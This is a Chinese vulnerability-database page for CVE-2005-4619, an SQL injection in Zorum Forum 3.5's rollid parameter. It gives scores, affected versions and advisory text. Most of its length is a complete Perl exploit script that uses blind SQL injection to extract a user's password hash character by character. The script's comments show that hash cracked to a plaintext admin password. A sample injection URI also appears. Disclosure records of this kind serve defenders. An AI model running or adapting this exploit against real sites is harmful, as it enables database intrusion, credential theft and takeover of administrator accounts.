CVE-2005-4619
CVSS7.5
发布时间 :2005-12-31 00:00:00
修订时间 :2008-09-20 00:43:34
NMCOES    

[原文]SQL injection vulnerability in index.php in phpoutsourcing Zorum Forum 3.5 and earlier allows remote attackers to execute arbitrary SQL commands via the rollid parameter in the showhtmllist method.


[CNNVD]PHPOutsourcing Zorum RollID SQL注入漏洞(CNNVD-200512-979)

        phpoutsourcing Zorum Forum 3.5及更早版本的index.php中存在SQL注入漏洞,远程攻击者可通过在showhtmllist方法中的rollid参数执行任意SQL命令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:phpoutsourcing:zorum:3.0
cpe:/a:phpoutsourcing:zorum:3.5
cpe:/a:phpoutsourcing:zorum:3.3
cpe:/a:phpoutsourcing:zorum:3.4
cpe:/a:phpoutsourcing:zorum:3.1
cpe:/a:phpoutsourcing:zorum:3.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4619
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4619
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-979
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16131
(UNKNOWN)  BID  16131
http://www.osvdb.org/21372
(UNKNOWN)  OSVDB  21372
http://pridels0.blogspot.com/2005/11/zorum-forum-35-rollid-sql-inj-vuln.html
(UNKNOWN)  MISC  http://pridels0.blogspot.com/2005/11/zorum-forum-35-rollid-sql-inj-vuln.html

- 漏洞信息

PHPOutsourcing Zorum RollID SQL注入漏洞
高危 SQL注入
2005-12-31 00:00:00 2006-07-03 00:00:00
远程  
        phpoutsourcing Zorum Forum 3.5及更早版本的index.php中存在SQL注入漏洞,远程攻击者可通过在showhtmllist方法中的rollid参数执行任意SQL命令。

- 公告与补丁

        

- 漏洞信息 (1509)

Zorum Forum 3.5 (rollid) Remote SQL Injection Exploit (EDBID:1509)
php webapps
2006-02-17 Verified
0 RusH
N/A [点击下载]
#!/usr/bin/perl

use LWP::UserAgent;

# -------------------------------------------------------------------------------------------
# Zorum forum (http://zorum.phpoutsourcing.com/) version 3.5 sql injection exploit
# by 1dt.w0lf // RusH security team
# *** work on all mysql versions
# -------------------------------------------------------------------------------------------
# Usage: r57zor.pl [path] [rollid] [username] 
# [path]     - path to forum
# [rollid]   - forum number where user create topic
# [username] - username for bruteforce
# -------------------------------------------------------------------------------------------
# screen:
# r57zor.pl http://zorum.phpoutsourcing.com/forum/ 4 admin
#  Please wait...
#  [################]
#
#  USER_NAME: admin
#  USER_PASS: 32b3956b2024e0fc
# -------------------------------------------------------------------------------------------  
# well it's just default sql crypting...
#  mysql_crk.exe 32b3956b2024e0fc
#  Hash: 32b3956b2024e0fc
#  Trying length 3
#  Trying length 4
#  Trying length 5
#  Trying length 6
#  Found pass: habzsi
# jabi-dabi-duuuu ... we are admins now... =)
# -------------------------------------------------------------------------------------------
# greets 2: GHC.ru , gst.void.ru
# -------------------------------------------------------------------------------------------
# 01.03.05


$path     = $ARGV[0];
$rollid   = $ARGV[1];
$username = $ARGV[2];

$s_num = 1;
$|++;

if (@ARGV < 2) { &usage; }
print " Please wait...\r\n";
print " [";

### quotes must die =)
($uusername = $username) =~ s/(.)/sprintf("%d,",ord($1))/eg;
$uusername =~ s/(.*),$/$1/;

while(1)
{
if(&found(47,58)==0) { &found(96,122); } 
$char = $i;
if ($char=="0") 
 { 
 print qq{] 
 
 USER_NAME: $username
 USER_PASS: $allchar
 };
 exit(); 
 }
else 
 { 
 print "#"; 
 $allchar .= chr($char); 
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
 
 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }
 
sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i<$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }
 
sub check($)
 {
 $n++;
 $ccheck = $_[0];
 $http_query = $path."index.php?method=showhtmllist&list=topic&rollid=".$rollid." AND u.name=char(".$uusername.") AND ascii(substring(u.password,".$s_num.",1))".$ccheck." /*";
 $mcb_reguest = LWP::UserAgent->new() or die;
 $res = $mcb_reguest->post($http_query); 
 @results = $res->content; 
 
 #print " HTTP QUERY : $http_query \r\n";
 
 foreach $result(@results)
  {
  if ($result =~ /details/) { return 1; }
  }
 return 0;
 }
 

sub usage()
 {
 print q( 
+-------------* Zorum sql injection exploit *--------------+
|                  r57 private stuff !!!                   |
|                   http://rst.void.ru                     |
|---* USAGE *----------------------------------------------|
| r57zor.pl [path] [rollid] [username]                     |
+--------------* view sources for more info *--------------+
 );
 exit();
 }

# milw0rm.com [2006-02-17]
		

- 漏洞信息

21372
Zorum index.php rollid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Zorum contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'rollid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-11-26 Unknow
2006-02-17 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

PHPOutsourcing Zorum RollID SQL Injection Vulnerability
Input Validation Error 16131
Yes No
2005-11-26 12:00:00 2008-08-27 07:15:00
rakstija r0t3d3Vil is credited with the discovery of this vulnerability.

- 受影响的程序版本

PHPOutsourcing Zorum 3.5
PHPOutsourcing Zorum 3.4
PHPOutsourcing Zorum 3.3
PHPOutsourcing Zorum 3.2
PHPOutsourcing Zorum 3.1
PHPOutsourcing Zorum 3.0

- 漏洞讨论

Zorum is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

- 漏洞利用

An exploit is not required.

The following example URI and script are available:

http://www.example.com/index.php?method=showhtmllist&amp;list=topic&amp;rollid=[SQL]

- 解决方案

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站